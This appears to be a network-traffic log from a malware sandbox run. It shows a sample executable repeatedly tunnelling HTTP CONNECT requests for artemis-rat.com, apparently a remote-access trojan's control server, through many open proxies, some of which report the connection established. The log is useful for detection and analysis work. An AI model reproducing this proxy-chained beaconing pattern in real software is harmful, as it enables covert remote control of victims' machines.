Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1137192.168.2.553185104.17.66.69803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.403259993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.557300091 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1138192.168.2.552983171.247.244.10310803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.403485060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1139192.168.2.55111345.230.48.1319993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.407080889 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.498730898 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.054064035 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1140192.168.2.553183162.159.242.158803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.407107115 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.967602968 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.129231930 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1141192.168.2.55298243.133.136.20888003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.409071922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1142192.168.2.552479139.162.181.177608443876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.418032885 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.505712986 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.608269930 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.717598915 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1143192.168.2.553219104.24.15.158803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.419583082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.574657917 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1144192.168.2.552559178.236.246.5331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.420916080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.001852036 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1145192.168.2.553036219.243.212.11880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.426731110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.753410101 CET22INHTTP/1.1 502 ERROR


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1146192.168.2.553186206.220.175.241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.428761959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1147192.168.2.553124135.148.10.161604153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.431241035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093034983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905122995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389684916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093161106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889548063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.592847109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.092796087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1148192.168.2.55316623.95.209.142156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.444675922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1149192.168.2.552411194.31.79.75314713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.445240974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.498722076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.595431089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702192068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1163192.168.2.551421212.110.188.204344113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.510854959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.498836040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.595442057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702203035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1164192.168.2.553088103.76.180.10831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.510857105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355074883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.446400881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702435017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108190060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.462961912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.811486959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.253346920 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1165192.168.2.55326538.54.6.3990803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.525394917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.743761063 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1166192.168.2.55305345.251.231.11356783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.527617931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1167192.168.2.55325545.196.148.19254323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.528561115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.762351036 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 65
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Proxy"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1168192.168.2.553277104.19.225.70803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
Mar 11, 2024 03:30:42.539269924 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.693546057 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1169192.168.2.553278104.24.220.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.540076971 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.694797039 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1170192.168.2.553191200.10.73.21056783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.540460110 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1171192.168.2.551428212.127.93.18580813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.541166067 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1172192.168.2.553122188.173.14.99406663876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
